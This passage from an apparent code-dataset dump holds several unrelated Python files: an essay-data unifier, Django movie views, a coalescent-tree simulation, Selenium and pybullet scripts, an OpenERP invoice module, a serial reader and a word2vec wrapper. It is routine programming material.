= line.split(\"\\t\")\n span_start = line[1].split(\" \")[1]\n span_end = line[1].split(\" \")[2]\n entity_content = entity_content + [{\"span\": [span_start, span_end], \"text\": line[2]}]\n return entity_content\n\n\ndef get_paragraphs_and_sufficient_per_id(essay_id: str) -> list:\n \"\"\"\n :rtype: list\n :param essay_id: ID as string including preceding zeros\n :return: list of dicts of the paragraphs with text and sufficient parameter\n \"\"\"\n tsv_file = open(CONST_SUFFICIENTPATH, \"r\", errors='ignore') # Has some weird characters, this removes them\n file_content = tsv_file.read()\n lines = file_content.split(\"\\n\") # Format in first Line: ESSAY\tARGUMENT\tTEXT\tANNOTATION\n lines.pop(0)\n paragraphs = []\n for line in lines:\n line = line.split(\"\\t\")\n if int(line[0]) == int(essay_id):\n sufficient = True\n if \"insufficient\" in line[3]:\n sufficient = False\n paragraphs = paragraphs + [{\"text\": line[2], \"sufficient\": sufficient}]\n return paragraphs\n\n\ndef get_confirmation_bias(essay_id: str) -> bool:\n \"\"\"\n :rtype: bool\n :param essay_id: ID as string including preceding zeros\n :return: true if confirmation bias true\n \"\"\"\n tsv_file = open(CONST_CONFIRMATIONBIAS, \"r\")\n file_content = tsv_file.read()\n lines = file_content.split(\"\\n\") # Format in first Line: id label\n lines.pop(0)\n for line in lines:\n line = line.split(\"\\t\")\n if line[0].split(\"essay\")[1] == essay_id:\n if line[1] == \"positive\":\n return True\n else:\n return False\n\n\ndef get_all_essay_data() -> list:\n # get all essayXXX.txt file names as basis\n essay_texts = list(filter(lambda x: \".txt\" in x, listdir(CONST_ESSAYPATH)))\n essay_texts.sort()\n all_output_elements = []\n # go through all essayXXX.txt files and gather all corresponding information\n for fileName in essay_texts:\n text_file = open(CONST_ESSAYPATH + fileName, \"r\", encoding=\"utf8\")\n file_id = fileName.split(\"essay\")[1].split(\".txt\")[0] # get ID of current file\n\n # read text-file and clean\n content = text_file.read()\n content = content.replace(\"\\n \\n\", \"\\n\\n\") # slight cleaning: essay140.txt has \"/n /n\" with a space\n content = content.replace(\"\\n \\n\", \"\\n\\n\") # slight cleaning: essay402.txt has \"/n /n\" with a space\n\n # title is contained in first part of the text-file\n title = content.split(\"\\n\\n\")[0]\n # all text is in the second part of the text-file\n text = content.split(\"\\n\\n\")[1]\n\n # gather corresponding essayXXX.ann file\n file_ann = open(CONST_ESSAYPATH + \"essay\" + file_id + \".ann\", \"r\")\n ann_content = file_ann.read()\n\n major_claims = get_entity_contents(ann_content, \"MajorClaim\")\n claims = get_entity_contents(ann_content, \"Claim\")\n premises = get_entity_contents(ann_content, \"Premise\")\n\n paragraphs = get_paragraphs_and_sufficient_per_id(file_id)\n\n bias = get_confirmation_bias(file_id)\n\n # create a output object as contained in output.json and save it\n obj = OutputObject(file_id, title, text, major_claims, claims, premises, paragraphs, bias)\n all_output_elements = all_output_elements + [obj]\n return all_output_elements\n\n\ndef main():\n print(\"Started to create the unified data file...\")\n all_essay_data = get_all_essay_data()\n # write\n json_dump = json.dumps([element.__dict__ for element in all_essay_data], indent=4, ensure_ascii=False)\n with open(f'{CURRENT_WORKING_DIR}/../data/unified_data.json', \"w\") as outfile:\n outfile.write(json_dump)\n print(\"Successfully created unified data in 
'/data/unified_data.json'.\")\n\n\n# run main function\nif __name__ == '__main__':\n main()\n","sub_path":"assignment01/data-acquisition-assignment/code/data-unification.py","file_name":"data-unification.py","file_ext":"py","file_size_in_byte":5579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"458732608","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom .models import Movies\n\ndef populate(request):\n return_msg = \"\"\n data = [{'episode_nb' : 1, 'title' : 'The Phantom Menace', 'director' : 'George Lucas', 'producer' : 'Rick McCallum', 'release_date' : '1999-05-19'},\n {'episode_nb' : 2, 'title' : 'Attack of the Clones', 'director' : 'George Lucas', 'producer' : 'Rick McCallum', 'release_date' : '2002-05-16'},\n {'episode_nb' : 3, 'title' : 'Revenge of the Sith', 'director' : 'George Lucas', 'producer' : 'Rick McCallum', 'release_date' : '2005-05-19'},\n {'episode_nb' : 4, 'title' : 'A New Hope', 'director' : 'George Lucas', 'producer' : 'Gary Kurtz, Rick McCallum', 'release_date' : '1977-05-25'},\n {'episode_nb' : 5, 'title' : 'The Empire Strikes Back', 'director' : 'Irvin Kershner', 'producer' : 'Gary Kurtz, Rick McCallum', 'release_date' : '1980-05-17'},\n {'episode_nb' : 6, 'title' : 'Return of the Jedi', 'director' : 'Richard Marquand','producer' : 'Howard G. Kazanjian, George Lucas, Rick McCallum', 'release_date' : '1983-05-25'},\n {'episode_nb' : 7, 'title' : 'The Force Awakens', 'director' : 'J. J. Abrams', 'producer' : 'Kathleen Kennedy, J. J. Abrams, Bryan Burk', 'release_date' : '2015-12-11'},\n ]\n\n for i in data:\n try:\n Movies.objects.create(episode_nb=i['episode_nb'], title=i['title'], director=i['director'],\n producer=i['producer'], release_date=i['release_date'])\n return_msg += \"OK\" + \"
    \"\n except Exception as err:\n return_msg += str(err) + \"
    \"\n\n return HttpResponse(return_msg)\n\ndef display(request):\n try:\n data = Movies.objects.all()\n except Exception:\n return HttpResponse(\"No data available\")\n\n return render(request, 'ex05/display_movies.html', {'data': data})\n\ndef remove_page(request, data):\n return render(request, 'ex05/delete_movies.html', {'data': data})\n\ndef remove_movie(request):\n try:\n data = Movies.objects.all()\n except Exception as err:\n return HttpResponse(\"No data available\")\n\n if request.method != 'POST':\n return remove_page(request, data)\n\n delete_str = Movies.objects.get(episode_nb=request.POST['movies'])\n delete_str.delete()\n\n return render(request, 'ex05/delete_movies.html', {'data': data})","sub_path":"day-05/d05/ex05/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"563816910","text":"\n# coding: utf-8\n\n# In[161]:\n\nimport numpy as np\nfrom Bio import Phylo\nfrom Bio.Phylo import PhyloXMLIO\nfrom io import StringIO\nfrom pygraphviz import *\nimport networkx, pylab\nfrom scipy.special import comb\nfrom scipy.stats import poisson\n\n\n# In[162]:\n\n#### initialization\n#mode = int(input('Enter the coalescent model number (1 for Kingman, 2 for Bolthausen-Sznitman Coalescent): '))\n#while mode < 1 or mode > 2:\n# print(\"Wrong Input!\")\n# mode = int(input('Enter the coalescent model number (1 for Kingman, 2 for Bolthausen-Sznitman Coalescent): '))\n#sample_size = int(input('Enter the value of total sample size: '))\n#while sample_size <= 1:\n# print(\"Wrong Input!\")\n# sample_size = int(input('Enter the value of total sample size: '))\nmode = 3\nsample_size = 100\nidentity_count = 1;\n#coalescent_list = [];#keeps track of samples/ancestors available for merging\nmu = 63; #mutation rate\nn = 5\n\n\n# In[163]:\n\nclass Sample:\n def __init__(self, left = None, right = None, ic = identity_count):\n global identity_count;\n self.identity = identity_count;\n self.bigPivot = identity_count;#will be used as a signal in choosin left/right child when constructing tree\n identity_count += 1;#Everytime a sample is created, increases by one to ensure unique identity for every sample created\n self.left = left\n self.right = right\n self.next = None;\n self.time = 0;\n self.total_time = 0\n self.descendent_list = []#what diff? all children\n self.children_list = []#what diff? 
direct children after one generation\n self.mutations = 0\n def getIdentity(self):\n return self.identity;\n def getMutations(self):\n return self.mutations;\n def getChildrenList(self):\n return self.children_list;\n def __repr__(self): \n return 'This sample\\'s unique identity number is: ' + str(self.identity) + ', and its coalescent time to direct ancestor is: ' + str(self.time) + ', and its number of mutations is: ' + str(self.mutations) \n\n\n# In[164]:\n\nclass Ancestors(Sample):\n def __init__(self):\n Sample.__init__(self);\n self.identity = 'A' + str(identity_count - (sample_size + 1))\n self.mutations = 0\n def getIdentity(self):#overriding\n return self.identity;\n def getMutations(self):\n return self.mutations;\n def __repr__(self): \n return 'This ancestor\\'s unique identity is: ' + str(self.identity) + ', and its coalescent time to direct ancestor is: ' + str(self.time) + ', and its number of mutations is: ' + str(self.mutations) \n\n\n# In[165]:\n\ndef kingmanF(n):\n return n*(n-1) / 2\n #return comb(n, 2, exact = False)\n\n\n# In[166]:\n\ndef bsF(n, mn_rate, coalescent_list):\n total_rate = 0;\n for m in range (2, len(coalescent_list)+1):\n i_rate = len(coalescent_list) / (m * (m-1));\n mn_rate.append(i_rate)\n total_rate += i_rate\n return total_rate\n\n\n# In[167]:\n\ndef updateDescendentList(children_list):\n temp_list = [];\n for i in range(0, len(children_list)):\n identity = str(children_list[i].getIdentity())\n if not 'A' in identity:\n temp_list.append(children_list[i])\n else:\n for j in range(0, len(children_list[i].descendent_list)):\n temp_list.append(children_list[i].descendent_list[j])\n insertionSort(temp_list)\n return temp_list\n\n\n# In[168]:\n\ndef insertionSort(children_list):\n for i in range(1, len(children_list)):\n current = children_list[i].bigPivot\n current_child = children_list[i]\n position = i\n while (position > 0) & (children_list[position - 1].bigPivot > current):\n children_list[position] = children_list[position - 1]\n position = position - 1\n children_list[position] = current_child\n\n\n# In[169]:\n\ndef createChild(coalescent_list, parent, children_list):\n insertionSort(children_list)\n parent.children_list = children_list\n parent.descendent_list = updateDescendentList(children_list)\n parent.right = children_list[len(children_list) - 1]\n for i in range (len(children_list) - 1, 0, -1):\n children_list[i].next = children_list[i - 1]\n coalescent_list.remove(children_list[i])\n parent.left = children_list[0]\n parent.bigPivot = children_list[len(children_list) - 1].bigPivot\n coalescent_list.remove(children_list[0])\n\n\n# In[170]:\n\ndef updateTime(parent, children_list, time):\n highest_time = children_list[0].total_time + time\n highest_index = []\n highest_index.append(0)\n for i in range (1, len(children_list)):\n this_time = children_list[i].total_time + time\n if this_time > highest_time:\n highest_time = this_time\n highest_index.clear();\n highest_index.append(i);\n elif this_time == highest_time:\n highest_index.append(i)\n for i in range (0, len(highest_index)):\n children_list[highest_index[i]].time = time\n children_list[highest_index[i]].total_time += children_list[highest_index[i]].time\n for i in range (0, len(children_list)):\n for j in range (0, len(highest_index)):\n if i == highest_index[j]:\n break\n else:\n children_list[i].time = highest_time - children_list[i].total_time \n temp_time = children_list[i].total_time\n children_list[i].total_time += children_list[i].time\n parent.total_time = parent.total_time + 
highest_time\n\n\n# In[171]:\n\ndef mergeKingman(coalescent_list):\n children_list = np.random.choice(coalescent_list, 2, replace=False)#two chosen at random\n merge_sample = Ancestors();\n coalescent_list.append(merge_sample);\n createChild(coalescent_list, merge_sample, children_list)\n time = np.random.exponential(1/kingmanF(len(coalescent_list) + 1)) \n updateTime(merge_sample, children_list, time)\n return coalescent_list;\n\n\n# In[172]:\n\ndef mergeBSF(m_list, coalescent_list):\n mn_rate = [];\n bsF_rate = [];\n total_rate = bsF(sample_size, mn_rate, coalescent_list)\n for i in range (0, len(mn_rate)):\n bsF_rate.append(mn_rate[i] / total_rate)\n m = np.random.choice(m_list, 1, replace = False, p = bsF_rate)\n children = np.random.choice(coalescent_list, m, replace = False);\n merge_sample = Ancestors();\n createChild(coalescent_list, merge_sample, children)\n coalescent_list.append(merge_sample);\n time = np.random.exponential(1/total_rate) \n updateTime(merge_sample, children, time)\n return coalescent_list;\n\n\n# In[173]:\n\ndef newick(sample, n):#recursive? yes, but need a helper method\n output = ''\n output = recurNewick((output + '('), sample.right, n)\n current = sample.right\n while current.next != sample.left:\n output = recurNewick(output+ ', ', current.next, n)\n current = current.next\n output = recurNewick(output + ', ', sample.left, n) + ')' + str(sample.getIdentity());\n return output; \n\n\n# In[174]:\n\ndef recurNewick(output, sample, n):\n #global total_branch_length\n #base case\n if (sample.left == None) & (sample.right == None):\n if n == 1:\n output = output + str(sample.getIdentity()) + ':{0:.{1}f}'.format(sample.time, 10)\n return output\n else:\n output = output + str(sample.getIdentity()) + ':' + str(sample.mutations)\n return output\n output = recurNewick((output + '('), sample.right, n)\n current = sample.right\n while current.next != sample.left:\n output = recurNewick(output + ', ', current.next, n)\n current = current.next\n if n == 1:\n output = recurNewick((output + ', '), sample.left, n) + ')' + str(sample.getIdentity()) + ':{0:.{1}f}'.format(sample.time, 10)\n else:\n output = recurNewick((output + ', '), sample.left, n) + ')' + str(sample.getIdentity()) + ':' + str(sample.mutations)\n return output\n\n\n# In[175]:\n\ndef analysis(sample):\n mean_sep_time = 0;\n mean_sep_time = recurTraversal(mean_sep_time, sample.right)\n current = sample.right\n while current.next != None:\n mean_sep_time = recurTraversal(mean_sep_time, current.next)\n current = current.next\n return mean_sep_time\n\n\n# In[176]:\n\ndef recurTraversal(mean_sep_time, sample):\n #base case\n global total_branch_length\n weight = 0;\n if (sample.left == None) & (sample.right == None):\n total_branch_length += sample.time\n identity = str(sample.getIdentity())\n if not 'A' in identity:\n k = 1\n else:\n k = len(sample.descendent_list)\n weight = ( k * (sample_size - k)) / comb(sample_size, 2);\n mean_sep_time = mean_sep_time + (weight * sample.time);\n sample.mutations = poisson.rvs(mu * sample.time)\n return mean_sep_time\n mean_sep_time = recurTraversal(mean_sep_time, sample.right)\n current = sample.right\n while current.next != None:\n mean_sep_time = recurTraversal(mean_sep_time, current.next)\n current = current.next\n total_branch_length += sample.time\n identity = str(sample.getIdentity())\n if not 'A' in identity:\n k = 1\n else:\n k = len(sample.descendent_list)\n weight = ( k * (sample_size - k)) / comb(sample_size, 2);\n mean_sep_time = mean_sep_time + (weight * 
sample.time);\n sample.mutations = poisson.rvs(mu * sample.time)\n return mean_sep_time\n\n\n# In[177]:\n\n#main instructions\nlist1 = []\nlist2 = []\nlist3 = []\nlist4 = []\nfor p in range (0, n):\n if mode == 3:\n identity_count = 1;\n coalescent_list1 = []\n coalescent_list2 = []\n for i in range(0, sample_size): \n new_sample1 = Sample();\n coalescent_list1.append(new_sample1);\n identity_count = identity_count - 1\n new_sample2 = Sample();\n coalescent_list2.append(new_sample2);\n ic = identity_count\n else: \n coalescent_list = []\n for i in range(0, sample_size): \n new_sample = Sample();\n coalescent_list.append(new_sample);\n\n #main instruction: loop until the most recent commont ancestor MRCA is reached.\n if mode == 1:#Kingman\n while len(coalescent_list) > 1:\n coalescent_list = mergeKingman(coalescent_list);\n elif mode == 2:#Bolthausen-Sznitman\n while len(coalescent_list) > 1:\n m_list = [];\n for i in range (2, len(coalescent_list) + 1):\n m_list.append(i);\n coalescent_list = mergeBSF(m_list, coalescent_list)\n else: #mode ==3 : Both Kingman and BS\n #1: kingman\n while len(coalescent_list1) > 1:\n coalescent_list1 = mergeKingman(coalescent_list1);\n k_ancestor = coalescent_list1.pop(); \n total_branch_length = 0;\n newickForm1 = newick(k_ancestor, 1)#tree in terms of time\n mean_time1 = analysis(k_ancestor)#analysis computes 1) heterozygosity, 2) total branch length, 3) number of mutations\n newickForm2 = newick(k_ancestor, 2)\n newickTBL = total_branch_length\n newickForm1 = str(newickForm1)\n newickForm2 = str(newickForm2)\n handle1 = StringIO(newickForm1)\n handle2 = StringIO(newickForm2)\n tree1 = Phylo.read(handle1, 'newick')\n tree2 = Phylo.read(handle2, 'newick')\n\n list1.append(tree1)\n list2.append(tree2)\n \n identity_count = ic;\n #2: BS\n while len(coalescent_list2) > 1: \n m_list = [];\n for i in range (2, len(coalescent_list2) + 1):\n m_list.append(i);\n coalescent_list2 = mergeBSF(m_list, coalescent_list2)\n BSF_ancestor = coalescent_list2.pop();\n total_branch_length = 0;\n newickForm3 = newick(BSF_ancestor, 1)#tree in terms of time\n mean_time2 = analysis(BSF_ancestor)#analysis computes 1) heterozygosity, 2) total branch length, 3) number of mutations\n newickForm4 = newick(BSF_ancestor, 2)\n BSF_TBL = total_branch_length; \n newickForm3 = str(newickForm3)\n newickForm4 = str(newickForm4)\n handle3 = StringIO(newickForm3)\n handle4 = StringIO(newickForm4)\n tree3 = Phylo.read(handle3, 'newick')\n tree4 = Phylo.read(handle4, 'newick')\n\n list3.append(tree3)\n list4.append(tree4)\n \n\n\n #else:\n # common_ancestor = coalescent_list.pop();\n # total_branch_length = 0;\n # newickForm1 = newick(common_ancestor, 1)#tree in terms of time\n # mean_time = analysis(common_ancestor)#analysis computes 1) heterozygosity, 2) total branch length, 3) number of mutations\n # newickForm2 = newick(common_ancestor, 2) \n\n\n# In[178]:\n\nfor p in range(0, n):\n print(p)\n Phylo.draw(list1[p])\n Phylo.draw(list2[p])\n Phylo.draw(list3[p])\n Phylo.draw(list4[p])\n #list5 = []\n #list5.append(list2[p])\n #list5.append(list4[p])\n #f_list = np.random.choice(list5, 2, replace=False)\n #Phylo.draw(f_list[0])\n #Phylo.draw(f_list[1])\n\n\n# In[ ]:\n\n\n\n","sub_path":"11-04 Clean.py","file_name":"11-04 Clean.py","file_ext":"py","file_size_in_byte":13014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"45570781","text":"from selenium.webdriver.common.by import By\nfrom time import sleep\nfrom 
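In the coalescent simulation above, Kingman waiting times are drawn with `np.random.exponential(1/kingmanF(n))`; NumPy parameterizes the exponential by its mean, so the expected waiting time while n lineages remain is 2/(n(n-1)). That is easy to spot-check (seed and sample count are illustrative):

```python
import numpy as np

def kingman_rate(n):
    return n * (n - 1) / 2               # C(n, 2) pairwise coalescence rate

rng = np.random.default_rng(0)
n = 10
draws = rng.exponential(scale=1 / kingman_rate(n), size=200_000)
# sample mean should sit near the theoretical 2 / (n (n - 1)) ~= 0.0222
assert abs(draws.mean() - 2 / (n * (n - 1))) < 1e-3
```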
homework.pageobject.page.basepage import BasePage\n\n\nclass AddDepartmentPage(BasePage):\n def add_department(self, name):\n self.driver.find_element(By.CSS_SELECTOR, '[name=name]').send_keys(name)\n self.driver.find_element(By.CSS_SELECTOR, \".js_parent_party_name\").click()\n self.driver.find_element(By.CSS_SELECTOR, \".qui_dialog_body.ww_dialog_body [id='1688852051058674_anchor']\").click()\n self.driver.find_element(By.CSS_SELECTOR, \"[id=__dialog__MNDialog__] div>div>a:nth-child(1)\").click()\n sleep(3)\n ele_list = self.driver.find_elements(By.CSS_SELECTOR, \".jstree-node.js_editable.jstree-leaf\")\n name_list = [i.text for i in ele_list]\n return name_list\n","sub_path":"homework/pageobject/page/add_department_page.py","file_name":"add_department_page.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"91550731","text":"# -*- encoding: utf-8 -*-\n#\n#\n# Copyright (C) 2011 Associazione OpenERP Italia\n# ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published\n# by the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n#\n\nfrom osv import fields, osv\nfrom tools.translate import _\n\n\nclass account_invoice(osv.osv):\n _inherit = 'account.invoice'\n _columns = {\n 'corrispettivo': fields.boolean('Corrispettivo'),\n }\n\n def onchange_company_id(\n self, cr, uid, ids, company_id, part_id, _type, invoice_line,\n currency_id, context=None\n ):\n if not context:\n context = {}\n journal_obj = self.pool.get('account.journal')\n res = super(account_invoice, self).onchange_company_id(\n cr, uid, ids, company_id, part_id,\n _type, invoice_line, currency_id)\n is_corrispettivo = context.get('corrispettivo', False)\n corr_journal_ids = journal_obj.search(\n cr, uid,\n [('corrispettivi', '=', True), ('company_id', '=', company_id)])\n\n # Se è un corrispettivo e la company ha almeno un sezionale\n # corrispettivi\n if is_corrispettivo and corr_journal_ids:\n res['value']['journal_id'] = corr_journal_ids[0]\n\n # Se la company ha almeno un sezionale corrispettivi ma l'invoice non è\n # un corrispettivo\n elif (\n corr_journal_ids\n and corr_journal_ids[0] in res['domain']['journal_id'][0][2]\n ):\n # Se l'on_change di invoice ha impostato il journal corrispettivi\n if (\n corr_journal_ids[0] == res['value']['journal_id']\n and len(res['domain']['journal_id'][0][2]) > 1\n ):\n for j_id in res['domain']['journal_id'][0][2]:\n if corr_journal_ids[0] != j_id:\n res['value']['journal_id'] = j_id\n break\n return res\n\n def _get_account(self, cr, uid, context=None):\n if context is None:\n context = {}\n is_corrispettivo = context.get('corrispettivo', False)\n res = False\n if is_corrispettivo:\n partner_obj = partner_ids = self.pool.get('res.partner')\n partner_ids = partner_obj.search(\n cr, uid, [('corrispettivi', '=', True)])\n if not partner_ids:\n raise osv.except_osv(_('Error!'),\n _('No partner \"corrispettivi\" found'))\n partner = partner_obj.browse(cr, uid, partner_ids[0])\n res = 
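The page object above pauses with `sleep(3)` after clicking, which either wastes time or flakes when the page is slow. An explicit wait is the usual replacement; a sketch reusing the same locator (`driver` and the 10-second timeout are assumptions of this sketch):

```python
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

# block until the freshly added department nodes are actually rendered
wait = WebDriverWait(driver, timeout=10)
elements = wait.until(EC.presence_of_all_elements_located(
    (By.CSS_SELECTOR, ".jstree-node.js_editable.jstree-leaf")))
names = [e.text for e in elements]
```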
partner.property_account_receivable.id\n return res\n\n def _get_partner_id(self, cr, uid, context=None):\n if context is None:\n context = {}\n is_corrispettivo = context.get('corrispettivo', False)\n res = False\n if is_corrispettivo:\n partner_obj = partner_ids = self.pool.get('res.partner')\n partner_ids = partner_obj.search(\n cr, uid, [('corrispettivi', '=', True)])\n if not partner_ids:\n raise osv.except_osv(_('Error!'),\n _('No partner \"corrispettivi\" found'))\n res = partner_ids[0]\n return res\n\n def onchange_corrispettivo(\n self, cr, uid, ids, corrispettivo=False, context=None\n ):\n res = {}\n user_obj = self.pool.get('res.users')\n journal_obj = self.pool.get('account.journal')\n company_id = user_obj.browse(cr, uid, uid).company_id.id\n corr_journal_ids = journal_obj.search(\n cr, uid,\n [('corrispettivi', '=', True), ('company_id', '=', company_id)])\n if corr_journal_ids and corrispettivo:\n res = {'value': {'journal_id': corr_journal_ids[0]}}\n return res\n\n _defaults = {\n 'partner_id': _get_partner_id,\n 'account_id': _get_account,\n }\n\naccount_invoice()\n\n\nclass account_journal(osv.osv):\n _inherit = 'account.journal'\n _columns = {\n 'corrispettivi': fields.boolean('Corrispettivi'),\n }\naccount_journal()\n\n\nclass res_partner(osv.osv):\n _inherit = 'res.partner'\n _columns = {\n 'corrispettivi': fields.boolean('Corrispettivi'),\n }\nres_partner()\n","sub_path":"l10n_it_corrispettivi/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":4817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"88326453","text":"import pybullet as p\nimport time\nimport pybullet_data as pd\nimport numpy as np\np.connect(p.GUI)\np.setAdditionalSearchPath(pd.getDataPath())\ndt = 1./240.\n\np.configureDebugVisualizer(p.COV_ENABLE_RENDERING,0)\np.loadURDF(\"plane.urdf\")\nrobot = p.loadURDF(\"aliengo/aliengo.urdf\",[0,0,0.5])\np.configureDebugVisualizer(p.COV_ENABLE_RENDERING,1)\np.setGravity(0,0,-9.8)\n\nALIENGO_DEFAULT_ABDUCTION_ANGLE = 0\nALIENGO_DEFAULT_HIP_ANGLE = 1.2\nALIENGO_DEFAULT_KNEE_ANGLE = -2.0\nNUM_LEGS = 4\nINIT_MOTOR_ANGLES = np.array([\n ALIENGO_DEFAULT_ABDUCTION_ANGLE,\n ALIENGO_DEFAULT_HIP_ANGLE,\n ALIENGO_DEFAULT_KNEE_ANGLE\n] * NUM_LEGS)\n\nMOTOR_NAMES = [\n \"FR_hip_joint\",\n \"FR_upper_joint\",\n \"FR_lower_joint\",\n \"FL_hip_joint\",\n \"FL_upper_joint\",\n \"FL_lower_joint\",\n \"RR_hip_joint\",\n \"RR_upper_joint\",\n \"RR_lower_joint\",\n \"RL_hip_joint\",\n \"RL_upper_joint\",\n \"RL_lower_joint\",\n]\nmotor_ids = []\n\nfor j in range (p.getNumJoints(robot)):\n joint_info = p.getJointInfo(robot,j)\n name = joint_info[1].decode('utf-8')\n print(\"joint_info[1]=\",name)\n if name in MOTOR_NAMES:\n motor_ids.append(j)\n\nfor index in range (12):\n joint_id = motor_ids[index]\n p.setJointMotorControl2(robot, joint_id, p.POSITION_CONTROL, INIT_MOTOR_ANGLES[index])\n p.resetJointState(robot, joint_id, INIT_MOTOR_ANGLES[index])\n \nprint(\"motor_ids=\",motor_ids)\nwhile p.isConnected():\n p.stepSimulation()\n time.sleep(dt)\n\n\n","sub_path":"examples/pybullet/gym/pybullet_data/aliengo/aliengo.py","file_name":"aliengo.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"207817300","text":"import collections\r\n\r\nclass Board:\r\n def reset():\r\n pass\r\n\r\nfrom iolib import *\r\n\r\nclass gui:\r\n def text_in(self,msg):\r\n print(msg)\r\n\r\nclass CMD_Handler(object):\r\n\r\n cmditem = 
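One detail worth noting in the aliengo script above: `resetJointState` teleports a joint instantly, while `setJointMotorControl2` only sets the target a PD position motor will track on subsequent `stepSimulation` calls, so the script pairs them to start in pose and hold it. A trimmed sketch of that pairing (motor force left at pybullet's default; `snap_and_hold` is this note's name):

```python
import pybullet as p

def snap_and_hold(body, joint_ids, angles):
    # teleport each joint to the pose, then keep a position motor holding it
    for joint, angle in zip(joint_ids, angles):
        p.resetJointState(body, joint, angle)
        p.setJointMotorControl2(body, joint, p.POSITION_CONTROL, targetPosition=angle)
```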
collections.namedtuple('CMD_Env', ('func', 'args', 'kwargs', 'help', 'argnames', 'para_names'))\r\n \r\n commands = {\r\n 'reset': cmditem(Board.reset, '', '', 'Reset the board', (), ()),\r\n 'save': cmditem(save, 'index', '-i', 'Save board to file ', ('index',), ('i',)),\r\n 'load': cmditem(load, 'index', '-i', 'Load board from file ', ('index',), ('i',)),\r\n 'savelocal': cmditem(savelocal, 'index', '-i', 'Save board to RAM as ', ('index',), ('i',)),\r\n 'loadlocal': cmditem(loadlocal, 'index', '-i', 'Load board from RAM', ('index',), ('i',)),\r\n 'set': cmditem(setpiece, 'x, y, piece, color', '-x, -y, -p, -c',\r\n ('Place a piece on board. x is a number or a letter. color can be the full' +\r\n ' color or just \\'w\\' or \\'b\\'. The same goes for piece'), ('x', 'y', 'piece', 'color'), ('x', 'y', 'p', 'c')) \r\n }\r\n \r\n def __init__(self, board, gui):\r\n self.board = board\r\n self.gui = gui\r\n\r\n def add_command(self, command, function):\r\n self.commands.append((command, function))\r\n\r\n def parse_command(self, command):\r\n if command == 'help':\r\n for command, data in self.commands.items():\r\n self.gui.text_in('{}: {}, {} - {}'.format(command, data.args, data.kwargs, data.help))\r\n else:\r\n for cmd, data in self.commands.items():\r\n if command == cmd:\r\n args = command.replace(cmd, '').split()\r\n if args[0] == 'help':\r\n self.gui.text_in('{}:\\n{}\\n{}\\n{}'.format(cmd, data.help, data.args, data.kwargs))\r\n else:\r\n cmdargs = list()\r\n for arg in args:\r\n if arg.startswith('-'):\r\n arg = arg.replace('-', '')\r\n for kwarg in data.para_names:\r\n if arg[:len(kwarg)] == kwarg:\r\n cmdargs.append(arg[len(kwarg):])\r\n else:\r\n cmdargs.append(arg)\r\n try:\r\n print(cmdargs)\r\n except UnboundLocalError:\r\n pass\r\n \r\n \r\n \r\n \r\n","sub_path":"cmd.py","file_name":"cmd.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"270665703","text":"import serial, sys\nimport syslog\nimport time\n\n#The following line is for serial over GPIO\nport = sys.argv[1]\nspeed = sys.argv[2]\n\nser = serial.Serial(port,speed)\n\nwhile True:\n # Serial read section\n line = ser.readline()\n line2=line.strip().decode('utf-8')\n data = [str(val) for val in line2.split(\",\")]\n print (\"data array from arduino: \")\n print (data)\nexit()","sub_path":"read_ser_01.py","file_name":"read_ser_01.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"575604800","text":"import logging\nimport operator\nimport pickle\n\nfrom gensim.models.word2vec import Word2Vec\nfrom ..constants import *\nfrom ..processing.normalize import Normalizer\n\n\nclass Vectorizer(object):\n def train(self, corpus, api, min_count):\n \"\"\"\n :param corpus: snippets, list or another iterable\n :param api: API elements to use for reformulation: classes, methods, etc.\n :param min_count: threshold for term occurrence to be included in the model\n :return:\n \"\"\"\n try:\n self.model = Word2Vec(corpus, sg=0, min_count=min_count, workers=4)\n self.storage = api\n self.model.init_sims(True)\n except RuntimeError as re:\n logging.warning(re)\n\n def save(self, path, base_name, info=None):\n \"\"\"\n Saves the model\n :param path: folder to save the model\n :param base_name: extentions are connected to the base name\n :param info: additional info about file type\n :return:\n \"\"\"\n\n if not hasattr(self, \"model\"):\n return\n 
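The `Vectorizer` record that begins above targets an older gensim where `in` and `n_similarity` live on the model object itself; since gensim 4 they sit on `model.wv`. A minimal usage sketch on a toy corpus (the corpus and names are illustrative):

```python
from gensim.models.word2vec import Word2Vec

corpus = [["open", "file", "read"], ["read", "stream", "bytes"], ["open", "socket"]]
model = Word2Vec(corpus, sg=0, min_count=1, workers=1)

kv = model.wv                      # gensim >= 4; gensim 3 proxied these on the model
if "read" in kv and "open" in kv:
    score = kv.n_similarity(["open", "file"], ["read"])  # cosine of mean vectors
    print(round(float(score), 3))
```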
